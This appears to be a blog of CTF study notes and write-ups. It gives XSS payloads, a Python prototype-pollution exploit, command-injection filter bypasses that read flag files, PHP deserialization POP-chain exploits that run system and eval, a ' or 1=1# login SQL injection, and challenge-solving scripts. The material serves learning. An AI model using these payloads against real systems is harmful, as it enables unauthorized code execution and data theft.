Supplementary notes on XSS for SRC work

Supplementary notes on XSS for SRC work

Preface
It has been a long time since I last worked with XSS. I recently relearned it systematically, so here are some additional notes.

Classification and identification
Reflected XSS: the input is echoed back directly in the response.
Stored XSS: the input can be written in and is still there after a refresh; commonly found in comment sections.

Common XSS payloads
XSS:
    <script>alert(123);</script>
    <a href="">xxx</a>
DOM XSS: depends on the situation.

September 16, 2024 · 1 min · 15 words · huarui

Python prototype chain pollution

I ran into a prototype chain pollution challenge and studied it.

Original challenge (BaseCTF 2024)
The challenge text reads: "J1ngHong says: you want to read the flag? Then the light of the holy key will stop you! But a little source code is fine, since you cannot read the flag anyway (lol)."

    from flask import Flask, request
    import json

    app = Flask(__name__)

    def merge(src, dst):
        for k, v in src.items():
            if hasattr(dst, '__getitem__'):
                if dst.get(k) and type(v) == dict:
                    merge(v, dst.get(k))
                else:
                    dst[k] = v
            elif hasattr(dst, k) and type(v) == dict:
                merge(v, getattr(dst, k))
            else:
                setattr(dst, k, v)

    def is_json(data):
        try:
            json.loads(data)
            return True
        except ValueError:
            return False

    class cls():
        def __init__(self):
            pass

    instance = cls()

    @app.route('/', methods=['GET', 'POST'])
    def hello_world():
        return open('/static/index.html', encoding="utf-8").read()

    @app.route('/read', methods=['GET', 'POST'])
    def Read():
        file = open(__file__, encoding="utf-8").read()
        return f"J1ngHong说:你想read flag吗? 那么圣钥之光必将阻止你! 但是小小的源码没事,因为你也读不到flag(乐) {file} "

    @app.route('/pollute', methods=['GET', 'POST'])
    def Pollution():
        if request.is_json:
            merge(json.loads(request.data), instance)
        else:
            return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
        return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"

    if __name__ == '__main__':
        app.run(host='0.0.0.0', port=80)

Prototype chain pollution analysis
The merge() above walks attributes recursively, so a key such as __class__ or __base__ lets the caller reach the parent class and overwrite an attribute shared by every subclass:

    class father:
        secret = "hello"

    class son_a(father):
        pass

    class son_b(father):
        pass

    def merge(src, dst):
        for k, v in src.items():
            if hasattr(dst, '__getitem__'):
                if dst.get(k) and type(v) == dict:
                    merge(v, dst.get(k))
                else:
                    dst[k] = v
            elif hasattr(dst, k) and type(v) == dict:
                merge(v, getattr(dst, k))
            else:
                setattr(dst, k, v)

    instance = son_b()
    payload = {
        "__class__": {
            "__base__": {
                "secret": "world"
            }
        }
    }
    print(son_a.secret)     # hello
    print(instance.secret)  # hello
    merge(payload, instance)
    print(son_a.secret)     # world
    print(instance.secret)  # world

Final payload
    GET /pollute HTTP/1.1
    Host: challenge.basectf.fun:39759
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    X-Forwarded-For: 127.0.0.1
    Priority: u=0, i
    Content-Type: application/json
    Content-Length: 108

    {
        "__init__": {
            "__globals__": {
                "__file__": "flag"
            }
        }
    }

Link ...

September 11, 2024 · 2 min · 234 words · huarui

biji

Notes

Miscellaneous notes
When reversing and the code contains *((BYTE*) ...), adding the macro #define BYTE unsigned char makes it compile normally.
system("tac flag.php") reads the file contents; ?c=system("tac%20fla*") means c=system("tac flag").
In a Linux shell: ls / (list all directories), ls /home (enter the home folder), cat /home/flag.txt (open flag.txt); tac is used the same way; ls ../ prints the contents of the parent directory.

Command filter bypasses
Black-hole bypass: system($c." >/dev/null 2>&1"); only the command after the semicolon goes into the black hole, so this is bypassed directly.
Double-semicolon bypass: ?c=tac f*;ls
Double && bypass: ?c=tac f*%26%26ls (note: if the asterisk is filtered, a question mark can be used; a filter on [0-9] and % does not catch sequences like %26).
Line-number bypass: ?c=nl<fla''g.php%7C%7Cls (this method may require viewing the page source).
When $ is allowed, rename flag.php to a .txt and access it directly: first run ?c=mv${IFS}fla?.php${IFS}a.txt%7C%7Cls, then use ls||ls to check whether the rename succeeded. Once it has, access a.txt directly. ...

September 9, 2024 · 1 min · 138 words · huarui

Some PHP quirks

Some PHP quirks

About "."
When the PHP version is below 8, a . in a GET parameter name is converted to _; but if the parameter name contains [, that [ is converted to _ and a . that follows it is no longer converted to _. So Jail_by.Happy is equivalent to ?Jail[by.Happy=xxxxxx.

Also:
    highlight_file(glob("/f*")[0]);
This code uses PHP to read a file and display its contents with syntax highlighting. Explanation of each part:
glob("/f*"): the glob function matches file paths against a pattern. The pattern /f* matches every file or directory whose name starts with f; in this context it lists all entries under / that start with f.
glob("/f*")[0]: glob returns an array of file paths; [0] accesses the first match. If there are several matches, only the first is taken.
highlight_file(): displays the contents of a file with syntax highlighting. By default highlight_file only outputs the file contents and does not return them as a string; it emits the HTML for the file contents straight to the browser.

September 9, 2024 · 1 min · 52 words · huarui

mathma

BaseCTF "Math Master" script
Script:

    import requests
    from bs4 import BeautifulSoup
    import re
    from requests.cookies import RequestsCookieJar

    result = 1
    session_cookie = 1
    for i in range(50):
        url = "http://challenge.basectf.fun:35901/"
        headers = {
            "Cache-Control": "max-age=0",
            "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"',
            "sec-ch-ua-mobile": "?0",
            "sec-ch-ua-platform": '"Windows"',
            "Upgrade-Insecure-Requests": "1",
            "Origin": "http://127.0.0.1:63738",
            "Content-Type": "application/x-www-form-urlencoded",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-User": "?1",
            "Sec-Fetch-Dest": "document",
            "Cookie": 'PHPSESSID=' + f"{session_cookie}",
            "Referer": "http://127.0.0.1:63738/",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.9",
            "Connection": "close",
        }
        data = {
            "answer": f"{result}",
        }
        response = requests.post(url, headers=headers, data=data)
        print(response.text)
        # pull the arithmetic expression out of the page
        match = re.search(r'me in 3 second (.+?)\?', response.text)
        if match:
            expression = match.group(1)
            expression = expression.replace('×', '*').replace('÷', '/')
            # note: eval runs whatever expression the server sent back
            result = eval(expression)
            result = round(float(result))
            print(result)
        cookies_text = str(response.cookies)
        print(cookies_text)  # example CookiesJar
        # keep the PHPSESSID so the next answer belongs to the same session
        match = re.search(r'PHPSESSID=([a-zA-Z0-9]+)', cookies_text)
        if match:
            phpsessid_value = match.group(1)
            print(phpsessid_value)  # output: r6vfuu1vs0ij7sf6saa8576lk8
            session_cookie = phpsessid_value

August 24, 2024 · 1 min · 142 words · huarui

Workaround for inaccessible private properties in deserialization

Workaround for inaccessible private properties in deserialization

Background
Today I worked on the BaseCTF deserialization challenges and ran into one where the PHP version was low enough that access to private properties could not be parsed.

Original challenge
    <?php
    highlight_file(__FILE__);

    class Sink
    {
        private $cmd = 'echo 123;';
        public function __toString()
        {
            eval($this->cmd);
        }
    }

    class Shark
    {
        private $word = 'Hello, World!';
        public function __invoke()
        {
            echo 'Shark says:' . $this->word;
        }
    }

    class Sea
    {
        public $animal;
        public function __get($name)
        {
            $sea_ani = $this->animal;
            echo 'In a deep deep sea, there is a ' . $sea_ani();
        }
    }

    class Nature
    {
        public $sea;
        public function __destruct()
        {
            echo $this->sea->see;
        }
    }

    if ($_POST['nature']) {
        $nature = unserialize($_POST['nature']);
    }

EXP
    <?php
    class Sink
    {
        private $cmd = 'system("cat /f*");';
    }

    class Shark
    {
        private $word;
        public function __construct()
        {
            $this->word = new Sink();
        }
    }

    class Sea
    {
        public $animal;
    }

    class Nature
    {
        public $sea;
    }

    $x = new Sink;
    $y = new Shark;
    $z = new Sea;
    $a = new Nature;
    $a->sea = $z;
    $z->animal = $y;
    echo urlencode(serialize($a));
    ?>

Method
When a private property is involved, it can be set from within the exploit script through __construct(). ...

August 24, 2024 · 1 min · 151 words · huarui

MoeCTF 铜人阵 (Bronze Men Formation) script

MoeCTF 铜人阵 (Bronze Men Formation) script

The original script pastes the same request/parse/reply block six times in a row; below it is restructured as one request function and a loop with the same behaviour.

    import re
    import requests
    from bs4 import BeautifulSoup

    url = "http://127.0.0.1:49885/"
    base_headers = {
        "Cache-Control": "max-age=0",
        "sec-ch-ua": '" Not A;Brand";v="99", "Chromium";v="104"',
        "sec-ch-ua-mobile": "?0",
        "sec-ch-ua-platform": '"Windows"',
        "Upgrade-Insecure-Requests": "1",
        "Origin": "http://127.0.0.1:63738",
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-User": "?1",
        "Sec-Fetch-Dest": "document",
        "Referer": "http://127.0.0.1:63738/",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Connection": "close",
    }


    def get_direction_description(directions):
        # direction lookup table
        direction_map = {
            1: "北方", 2: "东北方", 3: "东方", 4: "东南方",
            5: "南方", 6: "西南方", 7: "西方", 8: "西北方",
        }
        # strip surrounding whitespace from the input
        directions = directions.strip()
        try:
            # single number
            if ',' not in directions:
                direction = int(directions)
                return direction_map.get(direction, "无效输入")
            # two numbers
            direction_list = [int(d.strip()) for d in directions.split(',')]
            if len(direction_list) == 2:
                desc1 = direction_map.get(direction_list[0], "无效输入")
                desc2 = direction_map.get(direction_list[1], "无效输入")
                if desc1 == "无效输入" or desc2 == "无效输入":
                    return "无效输入"
                return f"{desc1}一个,{desc2}一个"
            else:
                return "无效输入"
        except ValueError:
            return "无效输入"


    def play_round(direct, session_cookie=None):
        # one POST to the challenge; returns the new status text and session cookie
        headers = dict(base_headers)
        if session_cookie is not None:
            headers["Cookie"] = 'session=' + session_cookie
        data = {"player": "77", "direct": direct}
        response = requests.post(url, headers=headers, data=data)
        soup = BeautifulSoup(response.text, 'html.parser')
        status_element = soup.find('h1', id='status')
        status_text = status_element.get_text(strip=True)
        # extract the session cookie from the response headers
        cookies_text = str(response.cookies)
        match = re.search(r'session=([a-zA-Z0-9._-]+)', cookies_text)
        if match:
            session_cookie = match.group(1)
            print(f"{session_cookie}")
        else:
            print("Session cookie not found")
        print(status_text)
        return status_text, session_cookie


    # first request: answer "弟子明白" to start the formation
    status_text, session_cookie = play_round("弟子明白")
    # the original repeats the following round five more times
    for _ in range(5):
        answer = get_direction_description(status_text)
        print(f"{answer}")
        status_text, session_cookie = play_round(answer, session_cookie)

August 19, 2024 · 6 min · 1103 words · huarui

Supplementary notes on login-form SQL injection

Supplementary notes on login-form SQL injection

Characteristics of login-form SQL injection
A statement of the following shape is the login type:
    $sql = "SELECT * FROM admin WHERE email='$email' AND pwd='$pwd'";

Injection method and principle
Universal password: ' or 1=1#
Enter ' or 1=1# in the username box and anything at all in the password box; the combined SQL query then becomes:
    select * from users where username='' or 1=1#' and password=md5('')
Semantic analysis: "#" is the comment symbol in MySQL, so everything after the hash is treated by MySQL as a comment and is not executed. In other words, the following two SQL statements are equivalent:
    select * from users where username='' or 1=1#' and password=md5('')
is equivalent to
    select * from users where username='' or 1=1
So what does the ' OR 1=1 # used in SQL injection actually mean? ...

August 19, 2024 · 1 min · 144 words · huarui

A rather interesting PHP challenge

A rather interesting challenge

First, the is_numeric() bypass
is_numeric() returns TRUE for numbers and numeric strings and FALSE otherwise; and under PHP's loose comparison, ('1234a' == 1234) is true, as is '12345%00'.

Challenge
    <?php
    highlight_file('final1l1l_challenge.php');
    error_reporting(0);
    include 'flag.php';

    $a = $_GET['a'];
    $b = $_POST['b'];

    if (isset($a) && isset($b)) {
        if (!is_numeric($a) && !is_numeric($b)) {
            if ($a == 0 && md5($a) == $b[$a]) {
                echo $flag;
            } else {
                die('noooooooooooo');
            }
        } else {
            die('Notice the param type!');
        }
    } else {
        die('Where is your param?');
    }

Here we need to know one key point ...

August 18, 2024 · 1 min · 69 words · huarui

moectf-pop

moectf-pop

Nearly half a year without touching deserialization, and it felt surprisingly unfamiliar when I picked it up again, so here are the original challenge and the PoC.

Original challenge
    <?php
    class class000
    {
        public function __destruct()
        {
            $this->check();
        }

        public function check()
        {
            if ($this->payl0ad === 0) {
                die('FAILED TO ATTACK');
            }
            $a = $this->what;
            $a();
        }
    }

    class class001
    {
        public $payl0ad;
        public $a;

        public function __invoke()
        {
            $this->a->payload = $this->payl0ad;
        }
    }

    class class002
    {
        private $sec;

        public function __set($a, $b)
        {
            $this->$b($this->sec);
        }

        public function dangerous($whaattt)
        {
            $whaattt->evvval($this->sec);
        }
    }

    class class003
    {
        public $mystr;

        public function evvval($str)
        {
            eval($str);
        }

        public function __tostring()
        {
            return $this->mystr;
        }
    }

    if (isset($_GET['data'])) {
        $a = unserialize($_GET['data']);
    } else {
        highlight_file(__FILE__);
    }

PoC
    <?php
    class class000
    {
        private $payl0ad = 1;
        public $what = 'class001';
    }

    class class001
    {
        public $payl0ad = 'echo';
        public $a;
    }

    class class002
    {
        public $sec;
    }

    class class003
    {
        public $mystr;
    }

    $x = new class000;
    $y = new class001;
    $z = new class002;
    $p = new class003;
    $x->what = $y;
    $y->a = $z;
    $y->payl0ad = 'dangerous';
    $z->sec = $p;
    $p->mystr = 'phpinfo();';
    echo urlencode(serialize($x));
    ?>

Note in particular: since eval executes PHP code, remember to include the trailing ";". ...

August 13, 2024 · 1 min · 147 words · huarui